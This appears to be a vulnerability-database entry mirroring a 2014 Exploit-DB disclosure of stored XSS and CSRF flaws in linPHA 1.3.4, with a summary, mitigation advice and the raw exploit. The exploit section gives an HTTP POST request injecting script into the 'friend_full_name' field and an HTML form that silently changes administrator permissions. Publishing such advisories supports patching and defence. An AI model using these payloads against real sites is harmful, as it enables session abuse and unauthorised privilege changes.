linPHA 1.3.4 - Pemanent XSS and CSRF

vendor:

Linpha

by:

killall-9@mail.com

8,8

CVSS

HIGH

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)

CWE

Product Name: Linpha

Affected Version From: 1.3.4

Affected Version To: 1.3.4

Patch Exists: YES

Related CWE: N/A

CPE: a:linpha:linpha:1.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Virtualbox (debian) and Apache

2014

linPHA 1.3.4 – Pemanent XSS and CSRF

The vulnerability exists due to improper validation of user-supplied input in the 'friend_user_name', 'friend_full_name' and 'friend_user_mail' parameters of the 'submit_mod_data.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary HTML and script code in the browser of the unsuspecting user in context of the vulnerable website. An attacker can also leverage CSRF to perform certain actions with the privileges of the targeted user, if the user has an active session and is induced to click a malicious link.

Mitigation:

Update to version 1.3.5 or later, or apply the patch from the vendor.

Source

Exploit-DB raw data:

# Exploit Title: linPHA 1.3.4 - Pemanent XSS and CSRF
# Date: 28/01/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://sourceforge.net/projects/linpha/
# Software Link: http://sourceforge.net/projects/linpha/files/latest/download
# Version: 1.3.4
# Tested on: Virtualbox (debian) and Apache

===[ Exploit ]===

1) Permanent XSS=>
.....
POST /linpha-1.3.4/actions/submit_mod_data.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/linpha-1.3.4/admin.php?page=mysettings
Cookie: PHPSESSID=bbdjarqpmknfpubtnc29rgodu0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

friend_user_name=admin&friend_full_name=%3Cscript%3Ealert%28%22xss+here%22%29%3B%3C%2Fscript%3E&friend_user_mail=admin%40gmail.com&id=1&action=frienduser
.....


2) CSRF (poc)=>
.....
<html>
<head>
<title>Pinata-CSRF-Tool</title>
</head>
<body>
<form action="http://localhost/linpha-1.3.4/admin.php?page=perms&edit=basket_mail&redirector=general" id="formid" method="post">
<input name="who" value="2" />
<input name="and_or" value="0" />
<input name="alb" value="0" />
<input name="change_permissions" value="true" />
<input type="submit" value="Invia"/>
</form>
</body>
</html>
.....

These vulnerabilities was found in the administration panel.
cheerZ.: